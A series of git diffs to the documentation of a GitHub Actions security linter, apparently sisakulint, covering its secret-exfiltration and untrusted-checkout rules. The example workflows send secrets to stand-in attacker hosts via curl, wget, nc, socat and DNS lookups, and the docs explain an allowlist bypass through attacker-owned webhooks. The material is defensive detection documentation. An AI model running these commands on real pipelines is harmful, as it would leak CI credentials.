+| other non-privileged triggers | Medium | Any trigger not in the privileged set above |
 
 ### Complementary Rules
 
@@ -352,10 +367,12 @@ The rule performs two types of analysis:
    - `run:` scripts (shell context)
    - `actions/github-script` `script:` parameter (JavaScript context)
 
+**Cross-file resolution is fail-safe.** The caller-side warning is emitted even when the callee cannot be resolved locally — for example when the callee is a remote reference (`owner/repo/.github/workflows/x.yml@ref`) or is not present in this repository. Only when the callee **is** resolved locally and is provably safe is the caller warning suppressed.
+
 ### Performance
 
 - **Detection**: O(n) where n is the number of jobs and steps
-- **Cross-file Analysis**: Each file is analyzed independently
+- **Cross-file Analysis**: Caller and callee taint state is collected per file, then correlated in a single join step after all files are parsed. A caller in one file and its local (`./`) callee in another are matched, so a finding can span two files.
 - **No External Calls**: Purely static analysis
 
 ### See Also

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -215,6 +215,8 @@ The allowlist is **per-command**, not flat. Each network command has its own all
 
 > **Note**: bare `github.com` is allowlisted only under `wget` — it is **not** trusted under `curl`, `http`, or `https`. To allow internal Vault / Artifactory / Nexus hosts, use the per-workflow `allowed-hosts` directive (below).
 
+> **This allowlist is a false-positive-reduction heuristic, not a security boundary.** Matching is by host (with a path prefix where one is specified), so it does **not** distinguish a legitimate destination from an attacker-controlled account or endpoint on the same domain — for example an attacker's own Slack/Discord webhook on `hooks.slack.com` / `discord.com/api`, or their own account on `codecov.io`. A secret sent to such a destination will **not** be flagged. Treat the allowlist as noise reduction for well-known CI services; rely on secret scoping, OIDC, and destination review for actual protection. (The allowlist does defend against suffix-spoofing such as `api.github.com.evil.com`, which is matched as untrusted.)
+
 ### Per-Workflow `allowed-hosts` Directive
 
 You can extend the allowlist on a per-workflow basis with a comment directive in the workflow file. The directive is parsed by the rule and merged with the built-in allowlist for that workflow only. Directive-sourced entries that are declared but never matched produce a **dead-allow** warning, and entries that fail to parse produce an **invalid-entry** warning — see the next two subsections.

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -9,7 +9,7 @@ weight: 44
 
 The `secret-exfiltration` rule detects patterns where GitHub Actions secrets may be exfiltrated to external services via network commands. This helps identify potential security vulnerabilities where secrets could be stolen by malicious actors.
 
-> **Note on lineage:** This rule is a sisakulint-original design. The upstream CodeQL Actions query catalog has no equivalent network-command/argument-level secret-sink detector — the closest CodeQL query, *Excessive Secrets Exposure*, addresses over-broad `permissions:` scopes rather than per-argument secret sinks. Likewise, zizmor's `secrets-inherit` / `github-token-leak` audits target a materially different attack surface. The detection model described below was authored from scratch.
+> **Note on lineage:** This rule is a sisakulint-original design. The CodeQL Actions query catalog has no equivalent network-command/argument-level secret-sink detector — the closest CodeQL query, *Excessive Secrets Exposure*, addresses over-broad `permissions:` scopes rather than per-argument secret sinks. Likewise, zizmor's `secrets-inherit` / `github-token-leak` audits target a materially different attack surface. The detection model described below was authored from scratch.
 
 ## Rule ID
 

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -21,7 +21,7 @@ Severity is decided **per argument**, not per command. The rule emits two levels
 
 - **Critical** is emitted when **both** of the following hold:
   - The command is `curl` or `wget`, AND
-  - The secret rides on a **data flag** — for `curl`: `-d` / `--data` / `--data-raw` / `-F` / `--form` / `-H` / `--header`; for `wget`: `--post-data` / `--post-file` / `--header`.
+  - The secret rides on a **data flag** — for `curl`: `-d` / `--data` / `--data-raw` / `--data-binary` / `--data-urlencode` / `-F` / `--form` / `-H` / `--header`; for `wget`: `--post-data` / `--post-file` / `--header`.
 - **High** is emitted in every other case the rule observes a secret leaving via a network command — including curl/wget when the secret is on a non-data argument (e.g. embedded in the URL), and any use of `http` / `https` (HTTPie) / `nc` / `netcat` / `ncat` / `telnet` / `socat` / `dig` / `nslookup` / `host`. These commands have no `dataFlags` table; their severity always degrades to **High** because the rule does not attempt argument classification on them.
 
 The `-X POST` flag is **not** used as a signal — the rule keys on the data-flag presence of the secret, not the HTTP method.
@@ -181,7 +181,7 @@ The "Risk Level" column shows the severity emitted **when a secret reaches a dat
 
 | Command | Risk when secret is on a data flag | Data flags |
 |---------|------------------------------------|------------|
-| `curl` | Critical | `-d`, `--data`, `--data-raw`, `-F`, `--form`, `-H`, `--header` |
+| `curl` | Critical | `-d`, `--data`, `--data-raw`, `--data-binary`, `--data-urlencode`, `-F`, `--form`, `-H`, `--header` |
 | `wget` | Critical | `--post-data`, `--post-file`, `--header` |
 | `http` / `https` (HTTPie) | High | (no per-flag classification) |
 | `nc` / `netcat` / `ncat` | High | (piped/stdin input — see *Stdin/Pipe Sink Detection* below) |
@@ -201,19 +201,19 @@ When a single command invocation has multiple destination arguments (e.g. `curl 
 
 ## Trusted Domains (Allowlisted)
 
-The following destinations are in the built-in `legitPatterns` allowlist and do not trigger alerts:
+The allowlist is **per-command**, not flat. Each network command has its own `legitPatterns` set in `pkg/core/secretexfiltration.go`; a host trusted under `curl` is not automatically trusted under `wget` or HTTPie. For example, `api.telegram.org` is allowlisted only for `curl` — using `http` / `https` (HTTPie) to reach the same host still flags.
 
-- GitHub: `api.github.com`, `githubusercontent.com`
-- Package Registries: `registry.npmjs.org`, `pypi.org`, `rubygems.org`, `crates.io`, `nuget.org`
-- Container Registries: `ghcr.io`, `docker.io`, `gcr.io`, `ecr.aws`, `azurecr.io`
-- CI/CD Services: `codecov.io`, `coveralls.io`, `circleci.com`, `travis-ci.com`
-- Monitoring: `sentry.io`, `datadoghq.com`, `newrelic.com`
-- Notifications: `hooks.slack.com`, `slack.com/api`, `discord.com/api`, `api.telegram.org`
-- Security Tools: `snyk.io`, `sonarcloud.io`
-- Infrastructure: `app.terraform.io`, `hashicorp`
-- Artifact Management: `jfrog.io`, `sonatype.org`
+| Command | Allowlisted destinations |
+|---------|--------------------------|
+| `curl` | `api.github.com`, `uploads.github.com`, `registry.npmjs.org`, `pypi.org`, `upload.pypi.org`, `rubygems.org`, `crates.io`, `nuget.org`, `api.nuget.org`, `packagist.org`, `pkg.go.dev`, `maven.org`, `hub.docker.com`, `ghcr.io`, `docker.io`, `gcr.io`, `ecr.aws`, `azurecr.io`, `jfrog.io`, `sonatype.org`, `slack.com/api`, `hooks.slack.com`, `discord.com/api`, `api.telegram.org`, `codecov.io`, `coveralls.io`, `codeclimate.com`, `sonarcloud.io`, `circleci.com`, `travis-ci.com`, `snyk.io`, `sentry.io`, `datadoghq.com`, `newrelic.com`, `pagerduty.com`, `opsgenie.com`, `app.terraform.io`, `hashicorp.com` (~38 entries; bare `github.com` is **not** in this list) |
+| `wget` | `github.com`, `githubusercontent.com` only |
+| `http` / `https` (HTTPie) | `api.github.com`, `uploads.github.com` only |
+| `nc` / `netcat` / `ncat` / `telnet` / `socat` | (none — every destination is flagged) |
+| `dig` | `@8.8.8.8`, `@1.1.1.1`, `localhost` |
+| `nslookup` | `8.8.8.8`, `1.1.1.1`, `localhost` |
+| `host` | `8.8.8.8`, `1.1.1.1` |
 
-> ⚠️ Previous versions of this documentation listed `github.com` (bare), `vault.*` (wildcard), `artifactory`, and `nexus`. These entries are **not** in the built-in allowlist and were incorrect; they have been removed. Use the per-workflow allowed-hosts directive (below) to add your own internal Vault or Artifactory hosts.
+> **Note on prior revisions**: earlier versions of this documentation listed `vault.*` (wildcard), `artifactory`, and `nexus` as allowlisted; those entries are **not** present in any command's `legitPatterns` and were incorrect, so they have been removed. Bare `github.com`, by contrast, **is** allowlisted — but only under `wget` (see `pkg/core/secretexfiltration.go:146`); it is **not** trusted under `curl`, `http`, or `https`. Use the per-workflow `allowed-hosts` directive (below) to add your own internal Vault or Artifactory hosts.
 
 ### Per-Workflow `allowed-hosts` Directive
 

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -9,36 +9,48 @@ weight: 44
 
 The `secret-exfiltration` rule detects patterns where GitHub Actions secrets may be exfiltrated to external services via network commands. This helps identify potential security vulnerabilities where secrets could be stolen by malicious actors.
 
+> **Note on lineage:** This rule is a sisakulint-original design. The upstream CodeQL Actions query catalog has no equivalent network-command/argument-level secret-sink detector — the closest CodeQL query, *Excessive Secrets Exposure*, addresses over-broad `permissions:` scopes rather than per-argument secret sinks. Likewise, zizmor's `secrets-inherit` / `github-token-leak` audits target a materially different attack surface. The detection model described below was authored from scratch.
+
 ## Rule ID
 
 `secret-exfiltration`
 
 ## Severity Levels
 
-- **Critical**: Network commands that actively send data (e.g., `curl -X POST`, `wget --post-data`) with secrets
-- **High**: Network commands that may expose secrets (e.g., `curl` with secrets in headers, DNS exfiltration)
+Severity is decided **per argument**, not per command. The rule emits two levels (`critical` and `high`) via `severityForCallArg` (`pkg/core/secretexfiltration.go:1273`):
+
+- **Critical** is emitted when **both** of the following hold:
+  - The command is `curl` or `wget`, AND
+  - The secret rides on a **data flag** — for `curl`: `-d` / `--data` / `--data-raw` / `-F` / `--form` / `-H` / `--header`; for `wget`: `--post-data` / `--post-file` / `--header`.
+- **High** is emitted in every other case the rule observes a secret leaving via a network command — including curl/wget when the secret is on a non-data argument (e.g. embedded in the URL), and any use of `http` / `https` (HTTPie) / `nc` / `netcat` / `ncat` / `telnet` / `socat` / `dig` / `nslookup` / `host`. These commands have no `dataFlags` table; their severity always degrades to **High** because the rule does not attempt argument classification on them.
+
+The `-X POST` flag is **not** used as a signal — the rule keys on the data-flag presence of the secret, not the HTTP method.
 
 ## Detected Patterns
 
 ### 1. Direct Secret Exfiltration via HTTP
 
-Secrets passed directly to network commands that send data to external URLs:
+Secrets passed directly to network commands that send data to external URLs. All three examples below are flagged as **Critical** because the secret rides on a curl/wget data flag (`-d`, `-H`, `--post-data`):
 
 ```yaml
-# BAD: curl with secret in POST data
+# CRITICAL: curl with secret in POST data (-d is a curl data flag)
 - run: |
-    curl -X POST https://attacker.com/collect \
+    curl https://attacker.com/collect \
       -d "token=${{ secrets.API_TOKEN }}"
 
-# BAD: Secret in HTTP header
+# CRITICAL: Secret in HTTP header (-H is a curl data flag)
 - run: |
     curl -H "Authorization: Bearer ${{ secrets.AUTH_TOKEN }}" \
       https://unknown-server.com/api
 
-# BAD: wget with POST data
+# CRITICAL: wget with POST data (--post-data is a wget data flag)
 - run: |
     wget --post-data "key=${{ secrets.SECRET_KEY }}" \
       https://malicious.site/exfil
+
+# HIGH: Secret embedded in the URL (no data flag, severity degrades)
+- run: |
+    curl "https://attacker.com/collect?token=${{ secrets.API_TOKEN }}"
 ```
 
 ### 2. DNS Exfiltration
@@ -73,20 +85,22 @@ Secrets piped to low-level network tools:
 
 ### 4. Environment Variable Leak
 
-Secrets passed via environment variables to network commands:
+Secrets passed via environment variables to network commands. **Routing the secret through `env:` does not lower its severity** — the rule tracks env-var-borne secrets back to the source and emits the same severity as if the secret were inlined:
 
 ```yaml
-# BAD: Secret leaked via env var
+# CRITICAL: env-var-routed secret still rides on -d (data flag)
 - env:
     MY_SECRET: ${{ secrets.SENSITIVE_DATA }}
   run: |
-    curl -X POST https://attacker.com/collect \
+    curl https://attacker.com/collect \
       -d "data=$MY_SECRET"
 ```
 
+This means `env:` is **not** a mitigation for exfiltration — it is only a mitigation for shell-injection (see `code-injection-critical`). Removing the dangerous destination is the only effective fix here.
+
 ## Safe Patterns (Not Flagged)
 
-The rule recognizes legitimate use cases and does NOT flag:
+The patterns below are **not flagged because their commands are outside `networkCommands`** (`npm`, `docker`, `aws`, `gcloud`, `az`, `gh`, `git`, `terraform`, `vault`, `twine`, …) — they are not "allowlisted destinations", they are simply not commands the rule analyzes. If you wrap any of these tools so that `curl`/`wget`/`nc`/etc. is actually invoked in the same step, that wrapped call will be analyzed normally.
 
 ### Package Publishing
 
@@ -163,30 +177,55 @@ The rule recognizes legitimate use cases and does NOT flag:
 
 ## Network Commands Monitored
 
-| Command | Risk Level | Common Data Flags |
-|---------|------------|-------------------|
-| `curl` | High | `-d`, `--data`, `--data-raw`, `-F`, `-H` |
-| `wget` | High | `--post-data`, `--header` |
-| `nc`/`netcat`/`ncat` | High | (piped input) |
-| `telnet` | High | (piped input) |
-| `socat` | High | (piped input) |
-| `dig` | High | (DNS exfiltration) |
-| `nslookup` | High | (DNS exfiltration) |
-| `host` | High | (DNS exfiltration) |
+The "Risk Level" column shows the severity emitted **when a secret reaches a data flag** for that command. When no data flag is involved, the rule degrades to **High** for any command in this table.
+
+| Command | Risk when secret is on a data flag | Data flags |
+|---------|------------------------------------|------------|
+| `curl` | Critical | `-d`, `--data`, `--data-raw`, `-F`, `--form`, `-H`, `--header` |
+| `wget` | Critical | `--post-data`, `--post-file`, `--header` |
+| `http` / `https` (HTTPie) | High | (no per-flag classification) |
+| `nc` / `netcat` / `ncat` | High | (piped/stdin input — see *Stdin/Pipe Sink Detection* below) |
+| `telnet` | High | (piped/stdin input) |
+| `socat` | High | (piped/stdin input) |
+| `dig` | High | (DNS exfiltration — query argument) |
+| `nslookup` | High | (DNS exfiltration — query argument) |
+| `host` | High | (DNS exfiltration — query argument) |
+
+### Stdin / Pipe Sink Detection
+
+For `nc` / `netcat` / `ncat` / `telnet` / `socat`, the rule additionally tracks **PipeInputs** (commands feeding the network tool through a shell pipe) and **StdinInputs** (commands feeding it via `<<<`, `<`, or heredoc). A `printf '%s' "$SECRET" | nc attacker 443` invocation is flagged because the secret reaches the network tool's stdin, even though it never appears as a positional argument.
+
+### Mixed-Destination Semantics
+
+When a single command invocation has multiple destination arguments (e.g. `curl -d 'x' https://a.example https://b.example`), the rule suppresses the finding **only if every destination is allowlisted**. A mix of trusted and untrusted destinations still emits a diagnostic — the rule errs on the side of reporting.
 
 ## Trusted Domains (Allowlisted)
 
-The following domains are considered trusted and won't trigger alerts:
+The following destinations are in the built-in `legitPatterns` allowlist and do not trigger alerts:
 
-- GitHub: `api.github.com`, `github.com`, `githubusercontent.com`
+- GitHub: `api.github.com`, `githubusercontent.com`
 - Package Registries: `registry.npmjs.org`, `pypi.org`, `rubygems.org`, `crates.io`, `nuget.org`
 - Container Registries: `ghcr.io`, `docker.io`, `gcr.io`, `ecr.aws`, `azurecr.io`
 - CI/CD Services: `codecov.io`, `coveralls.io`, `circleci.com`, `travis-ci.com`
 - Monitoring: `sentry.io`, `datadoghq.com`, `newrelic.com`
-- Notifications: `slack.com/api`, `hooks.slack.com`, `discord.com/api`, `api.telegram.org`
+- Notifications: `hooks.slack.com`, `slack.com/api`, `discord.com/api`, `api.telegram.org`
 - Security Tools: `snyk.io`, `sonarcloud.io`
-- Infrastructure: `app.terraform.io`, `vault.*`, `hashicorp`
-- Artifact Management: `jfrog.io`, `artifactory`, `nexus`, `sonatype.org`
+- Infrastructure: `app.terraform.io`, `hashicorp`
+- Artifact Management: `jfrog.io`, `sonatype.org`
+
+> ⚠️ Previous versions of this documentation listed `github.com` (bare), `vault.*` (wildcard), `artifactory`, and `nexus`. These entries are **not** in the built-in allowlist and were incorrect; they have been removed. Use the per-workflow allowed-hosts directive (below) to add your own internal Vault or Artifactory hosts.
+
+### Per-Workflow `allowed-hosts` Directive
+
+You can extend the allowlist on a per-workflow basis with a comment directive in the workflow file. The directive is parsed by the rule and merged with the global `legitPatterns` set for that workflow only. Directive-sourced entries that are declared but never matched produce a **dead-allow** warning, and entries that fail to parse produce an **invalid-entry** warning — see the next two subsections.
+
+### Dead-Allow Warning
+
+If a `allowed-hosts` directive declares a host that the rule never references during analysis of that workflow, the rule emits a diagnostic prompting you to remove the unused entry. This prevents allowlists from growing stale and silently widening trust over time.
+
+### Invalid-Entry Warning
+
+Malformed entries in an `allowed-hosts` directive (e.g. unquoted patterns, syntax errors) are reported as invalid-entry warnings. The rule does **not** silently drop them — an unparsed entry never widens the allowlist by accident.
 
 ## Why This Rule Matters
 
@@ -198,36 +237,43 @@ The following domains are considered trusted and won't trigger alerts:
 ## Remediation
 
 1. **Review all network commands** that use secrets
-2. **Verify destination URLs** are trusted and necessary
-3. **Use environment variables** instead of inline secrets when possible
-4. **Limit secret scope** using job-level or step-level secrets
-5. **Enable audit logging** to track secret access
-6. **Use OIDC** instead of long-lived credentials where possible
+2. **Verify destination URLs** are trusted and necessary (use the `allowed-hosts` directive for legitimate internal hosts)
+3. **Limit secret scope** using job-level or step-level secrets
+4. **Enable audit logging** to track secret access
+5. **Use OIDC** instead of long-lived credentials where possible
+
+> Note: Routing the secret through `env:` is **not a remediation for exfiltration.** The rule detects env-var-borne secrets at the same severity as inline secrets. Use `env:` to defend against shell injection (see [`code-injection-critical`]({{< ref "codeinjectioncritical.md" >}})); use destination removal / dedicated actions / OIDC to defend against exfiltration.
 
 ## Example Fix
 
-Before (Vulnerable):
+Before (Vulnerable — Critical, secret on a `-d` data flag):
 ```yaml
 - run: |
-    curl -X POST https://analytics.company.com/track \
+    curl https://analytics.company.com/track \
       -d "api_key=${{ secrets.ANALYTICS_KEY }}"
 ```
 
-After (Safe):
+After:
 ```yaml
-# Option 1: Use a dedicated action
+# Option 1 (preferred): Use a dedicated action so the secret never
+# crosses a network-command boundary in your workflow.
 - uses: company/analytics-action@v1
   with:
     api-key: ${{ secrets.ANALYTICS_KEY }}
 
-# Option 2: Use environment variable and validate URL
+# Option 2: Route through an allowlisted destination. Note that
+# moving the secret into env: does NOT change the severity — the
+# rule still tracks it. The fix here is the trusted destination
+# (api.segment.io would also need an allowed-hosts directive if
+# not in the built-in legitPatterns set).
 - env:
     ANALYTICS_KEY: ${{ secrets.ANALYTICS_KEY }}
   run: |
-    # Use a well-known analytics service
-    curl -X POST https://api.segment.io/v1/track \
+    curl https://api.segment.io/v1/track \
       -H "Authorization: Bearer $ANALYTICS_KEY"
 ```
+
+> Auto-fix: the `secret-exfiltration` rule has **no auto-fix**. Remediation requires a human judgment about whether the destination is legitimate and whether the secret needs to reach the network at all.
 
 ## Related Rules
 

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -17,12 +17,12 @@ The `secret-exfiltration` rule detects patterns where GitHub Actions secrets may
 
 ## Severity Levels
 
-Severity is decided **per argument**, not per command. The rule emits two levels (`critical` and `high`) via `severityForCallArg` (`pkg/core/secretexfiltration.go:1273`):
+Severity is decided **per argument**, not per command. The rule emits two levels (`critical` and `high`):
 
 - **Critical** is emitted when **both** of the following hold:
   - The command is `curl` or `wget`, AND
   - The secret rides on a **data flag** — for `curl`: `-d` / `--data` / `--data-raw` / `--data-binary` / `--data-urlencode` / `-F` / `--form` / `-H` / `--header`; for `wget`: `--post-data` / `--post-file` / `--header`.
-- **High** is emitted in every other case the rule observes a secret leaving via a network command — including curl/wget when the secret is on a non-data argument (e.g. embedded in the URL), and any use of `http` / `https` (HTTPie) / `nc` / `netcat` / `ncat` / `telnet` / `socat` / `dig` / `nslookup` / `host`. These commands have no `dataFlags` table; their severity always degrades to **High** because the rule does not attempt argument classification on them.
+- **High** is emitted in every other case the rule observes a secret leaving via a network command — including curl/wget when the secret is on a non-data argument (e.g. embedded in the URL), and any use of `http` / `https` (HTTPie) / `nc` / `netcat` / `ncat` / `telnet` / `socat` / `dig` / `nslookup` / `host`. These commands have no per-flag data-flag classification; their severity always degrades to **High** because the rule does not attempt argument classification on them.
 
 The `-X POST` flag is **not** used as a signal — the rule keys on the data-flag presence of the secret, not the HTTP method.
 
@@ -100,7 +100,7 @@ This means `env:` is **not** a mitigation for exfiltration — it is only a miti
 
 ## Safe Patterns (Not Flagged)
 
-The patterns below are **not flagged because their commands are outside `networkCommands`** (`npm`, `docker`, `aws`, `gcloud`, `az`, `gh`, `git`, `terraform`, `vault`, `twine`, …) — they are not "allowlisted destinations", they are simply not commands the rule analyzes. If you wrap any of these tools so that `curl`/`wget`/`nc`/etc. is actually invoked in the same step, that wrapped call will be analyzed normally.
+The patterns below are **not flagged because their commands are not network commands the rule analyzes** (`npm`, `docker`, `aws`, `gcloud`, `az`, `gh`, `git`, `terraform`, `vault`, `twine`, …) — they are not "allowlisted destinations", they are simply outside the rule's analysis scope. If you wrap any of these tools so that `curl`/`wget`/`nc`/etc. is actually invoked in the same step, that wrapped call will be analyzed normally.
 
 ### Package Publishing
 
@@ -193,7 +193,7 @@ The "Risk Level" column shows the severity emitted **when a secret reaches a dat
 
 ### Stdin / Pipe Sink Detection
 
-For `nc` / `netcat` / `ncat` / `telnet` / `socat`, the rule additionally tracks **PipeInputs** (commands feeding the network tool through a shell pipe) and **StdinInputs** (commands feeding it via `<<<`, `<`, or heredoc). A `printf '%s' "$SECRET" | nc attacker 443` invocation is flagged because the secret reaches the network tool's stdin, even though it never appears as a positional argument.
+For `nc` / `netcat` / `ncat` / `telnet` / `socat`, the rule additionally tracks commands feeding the tool through a shell pipe, and via `<<<` / `<` / heredoc. A `printf '%s' "$SECRET" | nc attacker 443` invocation is flagged because the secret reaches the network tool's stdin, even though it never appears as a positional argument.
 
 ### Mixed-Destination Semantics
 
@@ -201,7 +201,7 @@ When a single command invocation has multiple destination arguments (e.g. `curl 
 
 ## Trusted Domains (Allowlisted)
 
-The allowlist is **per-command**, not flat. Each network command has its own `legitPatterns` set in `pkg/core/secretexfiltration.go`; a host trusted under `curl` is not automatically trusted under `wget` or HTTPie. For example, `api.telegram.org` is allowlisted only for `curl` — using `http` / `https` (HTTPie) to reach the same host still flags.
+The allowlist is **per-command**, not flat. Each network command has its own allowlist; a host trusted under `curl` is not automatically trusted under `wget` or HTTPie. For example, `api.telegram.org` is allowlisted only for `curl` — using `http` / `https` (HTTPie) to reach the same host still flags.
 
 | Command | Allowlisted destinations |
 |---------|--------------------------|
@@ -213,11 +213,11 @@ The allowlist is **per-command**, not flat. Each network command has its own `le
 | `nslookup` | `8.8.8.8`, `1.1.1.1`, `localhost` |
 | `host` | `8.8.8.8`, `1.1.1.1` |
 
-> **Note on prior revisions**: earlier versions of this documentation listed `vault.*` (wildcard), `artifactory`, and `nexus` as allowlisted; those entries are **not** present in any command's `legitPatterns` and were incorrect, so they have been removed. Bare `github.com`, by contrast, **is** allowlisted — but only under `wget` (see `pkg/core/secretexfiltration.go:146`); it is **not** trusted under `curl`, `http`, or `https`. Use the per-workflow `allowed-hosts` directive (below) to add your own internal Vault or Artifactory hosts.
+> **Note on prior revisions**: earlier versions of this documentation listed `vault.*` (wildcard), `artifactory`, and `nexus` as allowlisted; those entries are **not** present in any command's allowlist and were incorrect, so they have been removed. Bare `github.com`, by contrast, **is** allowlisted — but only under `wget`; it is **not** trusted under `curl`, `http`, or `https`. Use the per-workflow `allowed-hosts` directive (below) to add your own internal Vault or Artifactory hosts.
 
 ### Per-Workflow `allowed-hosts` Directive
 
-You can extend the allowlist on a per-workflow basis with a comment directive in the workflow file. The directive is parsed by the rule and merged with the global `legitPatterns` set for that workflow only. Directive-sourced entries that are declared but never matched produce a **dead-allow** warning, and entries that fail to parse produce an **invalid-entry** warning — see the next two subsections.
+You can extend the allowlist on a per-workflow basis with a comment directive in the workflow file. The directive is parsed by the rule and merged with the built-in allowlist for that workflow only. Directive-sourced entries that are declared but never matched produce a **dead-allow** warning, and entries that fail to parse produce an **invalid-entry** warning — see the next two subsections.
 
 ### Dead-Allow Warning
 
@@ -265,7 +265,7 @@ After:
 # moving the secret into env: does NOT change the severity — the
 # rule still tracks it. The fix here is the trusted destination
 # (api.segment.io would also need an allowed-hosts directive if
-# not in the built-in legitPatterns set).
+# not in the built-in allowlist).
 - env:
     ANALYTICS_KEY: ${{ secrets.ANALYTICS_KEY }}
   run: |

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -213,7 +213,7 @@ The allowlist is **per-command**, not flat. Each network command has its own all
 | `nslookup` | `8.8.8.8`, `1.1.1.1`, `localhost` |
 | `host` | `8.8.8.8`, `1.1.1.1` |
 
-> **Note on prior revisions**: earlier versions of this documentation listed `vault.*` (wildcard), `artifactory`, and `nexus` as allowlisted; those entries are **not** present in any command's allowlist and were incorrect, so they have been removed. Bare `github.com`, by contrast, **is** allowlisted — but only under `wget`; it is **not** trusted under `curl`, `http`, or `https`. Use the per-workflow `allowed-hosts` directive (below) to add your own internal Vault or Artifactory hosts.
+> **Note**: bare `github.com` is allowlisted only under `wget` — it is **not** trusted under `curl`, `http`, or `https`. To allow internal Vault / Artifactory / Nexus hosts, use the per-workflow `allowed-hosts` directive (below).
 
 ### Per-Workflow `allowed-hosts` Directive
 

--- a/content/docs/rules/secretexfiltration.md
+++ b/content/docs/rules/secretexfiltration.md
@@ -58,13 +58,13 @@ Secrets passed directly to network commands that send data to external URLs. All
 Secrets embedded in DNS queries for data exfiltration:
 
 ```yaml
-# BAD: dig with secret in subdomain
+# HIGH: dig with secret in subdomain
 - run: dig ${{ secrets.TOKEN }}.attacker.com
 
-# BAD: nslookup exfiltration
+# HIGH: nslookup exfiltration
 - run: nslookup ${{ secrets.SECRET }}.evil.com
 
-# BAD: host command exfiltration
+# HIGH: host command exfiltration
 - run: host ${{ secrets.API_KEY }}.malicious.com
 ```
 
@@ -73,13 +73,13 @@ Secrets embedded in DNS queries for data exfiltration:
 Secrets piped to low-level network tools:
 
 ```yaml
-# BAD: netcat exfiltration
+# HIGH: netcat exfiltration
 - run: echo "${{ secrets.PASSWORD }}" | nc attacker.com 443
 
-# BAD: telnet exfiltration
+# HIGH: telnet exfiltration
 - run: echo "${{ secrets.CREDENTIALS }}" | telnet evil.com 23
 
-# BAD: socat exfiltration
+# HIGH: socat exfiltration
 - run: echo "${{ secrets.TOKEN }}" | socat - TCP:attacker.com:8080
 ```
 
@@ -177,7 +177,7 @@ The patterns below are **not flagged because their commands are not network comm
 
 ## Network Commands Monitored
 
-The "Risk Level" column shows the severity emitted **when a secret reaches a data flag** for that command. When no data flag is involved, the rule degrades to **High** for any command in this table.
+The "Risk when secret is on a data flag" column shows the severity emitted **when a secret reaches a data flag** for that command. When no data flag is involved, the rule degrades to **High** for any command in this table.
 
 | Command | Risk when secret is on a data flag | Data flags |
 |---------|------------------------------------|------------|

--- a/content/docs/rules/untrustedcheckout.md
+++ b/content/docs/rules/untrustedcheckout.md
@@ -78,38 +78,11 @@ jobs:
 
 ### Technical Detection Mechanism
 
-The rule performs a three-pass analysis. The pseudocode below mirrors the actual call sites (`pkg/core/untrustedcheckout.go`) rather than a paraphrased sketch.
+The rule detects in three passes over the workflow:
 
-**Pass 1 (`VisitWorkflowPre`): collect privileged triggers and per-job narrowing**
-
-```go
-// Workflow-level triggers populate workflowTriggerInfos.
-// JobTriggerAnalyzer then narrows per-job triggers using job-level
-// if: conditions so that a guarded job only inherits the triggers
-// its condition actually permits. Results are stored per-job in
-// jobHasDangerousTrigger (NOT on a workflow-wide flag).
-```
-
-**Pass 2 (`VisitJobPre`): record dangerous-trigger position per job**
-
-```go
-// For every job whose narrowed trigger set intersects
-// {pull_request_target, issue_comment, workflow_run, workflow_call},
-// remember dangerousTriggerPos / dangerousTriggerName so later
-// diagnostics can cite the originating trigger line:column.
-```
-
-**Pass 3 (`VisitStep`): inspect `actions/checkout` ref**
-
-```go
-// strings.HasPrefix(action.Uses.Value, "actions/checkout@")
-// → isUntrustedPRRef(refValue) → IsUnsafeCheckoutRef(refValue)
-//   does a CASE-INSENSITIVE substring scan against a list of
-//   10 known unsafe substrings (see "Untrusted Ref Patterns"
-//   below), AND treats any ${{ ... }} expression not present in
-//   the safe-patterns allowlist as unsafe ("conservative
-//   unknown expression" rule, see section below).
-```
+1. **Collect privileged triggers** — it gathers the workflow's triggers and narrows them per job, honoring job-level `if:` conditions so that a guarded job only inherits the triggers its condition actually permits.
+2. **Locate dangerous-trigger jobs** — for every job whose narrowed trigger set includes a privileged trigger (`pull_request_target`, `issue_comment`, `workflow_run`, `workflow_call`), it records the originating trigger's position so later diagnostics can cite the line and column.
+3. **Inspect `actions/checkout` refs** — for each checkout step it examines the `ref:` value with a case-insensitive substring scan against the known-unsafe substrings listed below, plus a conservative-unknown-expression rule: any `${{ ... }}` expression not on the safe-patterns allowlist is treated as unsafe.
 
 ### Detection Logic Explanation
 
@@ -139,7 +112,7 @@ The rule performs a three-pass analysis. The pseudocode below mirrors the actual
 
 #### Untrusted Ref Patterns
 
-The rule's `IsUnsafeCheckoutRef` performs a **case-insensitive substring scan** over the literal text of the `ref:` input. Any ref whose value contains one of the following substrings is flagged. The list below is **exhaustive** — these are the 10 substrings the rule actually scans for (defined as `unsafePatternsLower` in `cachepoisoningutil.go`).
+The rule performs a **case-insensitive substring scan** over the literal text of the `ref:` value. Any ref whose value contains one of the following substrings is flagged. The list below is **exhaustive** — these are the 10 substrings the rule actually scans for.
 
 **Full GitHub-context expressions** (the canonical PR-head refs):
 
@@ -173,7 +146,7 @@ Any `${{ ... }}` expression in the `ref:` input that does **not** appear in the 
 
 #### Trigger Narrowing via Job-Level `if:`
 
-The rule does not assume that a privileged workflow trigger means every job is privileged. The `JobTriggerAnalyzer` honors job-level `if:` conditions when computing the set of triggers under which each job is analyzed — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed as a `push` job only, and the untrusted-checkout diagnostic is suppressed accordingly.
+The rule does not assume that a privileged workflow trigger means every job is privileged. The rule honors job-level `if:` conditions when computing the set of triggers under which each job is analyzed — e.g. a job guarded by `if: github.event_name == 'push'` inside a `pull_request_target`-triggered workflow is analyzed as a `push` job only, and the untrusted-checkout diagnostic is suppressed accordingly.
 
 #### Safe Patterns
 

--- a/content/docs/rules/untrustedcheckout.md
+++ b/content/docs/rules/untrustedcheckout.md
@@ -240,7 +240,7 @@ Classifying `issue_comment` as privileged is correct in the sense that the workf
 - **Newer repositories (created after February 2023)** default to read-only `GITHUB_TOKEN` (Contents/Metadata/Packages). Other API surfaces (issues, actions, pulls) return `403` unless the workflow declares a `permissions:` block explicitly.
